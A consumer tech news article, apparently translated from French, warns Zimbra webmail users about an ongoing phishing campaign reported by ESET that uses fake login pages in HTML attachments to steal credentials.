Be careful if you use Zimbra, the webmail used in particular by Free! A massive phishing campaign uses an email server update or account deactivation to steal usernames and passwords.
Zimbra webmail is very popular with Free subscribers, French administrations and companies that do not have the means or the desire to pay for the Microsoft suite – France is in the top five countries that use Zimbra. Suffice to say, this popular alternative to enterprise email solutions is a prime target for cybercriminals. ESET Research has uncovered a massive phishing campaign aimed at harvesting the credentials of users of the open-source collaborative software platform, particularly small and medium-sized businesses, as well as government entities in Europe. It targets Poland, Ukraine, Italy, France, the Netherlands, as well as Latin American countries such as Ecuador. Active since at least April 2023, it is still ongoing. So be careful!
Phishing Zimbra: a classic but effective campaign
If this malicious operation is not presented as “technically particularly sophisticated”, it is able to spread easily within a company using Zimbra and cause significant damage. Hackers send messages warning about mail server update, account deactivation or any other such issue. The victim is prompted to click on an HTML file attachment, which is obviously compromised. “Hackers take advantage of the fact that HTML attachments contain legitimate code, with the only telltale element being a link pointing to the malicious host. compared to more popular phishing techniques, where a malicious link is placed directly in the body of the email”explains Viktor Šperka, researcher at ESET, in A press release.
After opening the attachment, the user is presented with a fake Zimbra login page customized to the targeted organization. “Note that the ‘Username’ field is pre-filled in the login form, which makes it more legitimate”, explains ESET. Then, the course is that of a very classic phishing campaign. The HTML file is opened in the victim’s browser, which may lead them to believe that they have been directed to the legitimate login page, even though the URL points to a local file path. In the background, the submitted credentials are collected in the HTML form and sent to a server controlled by the hackers. They then have plenty of time to infiltrate the email account.
Cybersecurity researchers repeatedly noted subsequent waves of phishing emails sent from legitimate company Zimbra accounts, which had previously been targeted. It is likely that cybercriminals compromised victims’ accounts and created new mailboxes, which were then in turn used to send phishing emails. This is not the first time that Zimbra has been vulnerable to cybercriminals. Already in August and October 2022, several high and critical security vulnerabilities were detected. Again last July, multiple vulnerabilities were identified. Some of them could have allowed an attacker “to cause a security problem not specified by the publisher, a circumvention of the security policy and a breach of data confidentiality”, according to CERT-EN. So don’t let your guard down!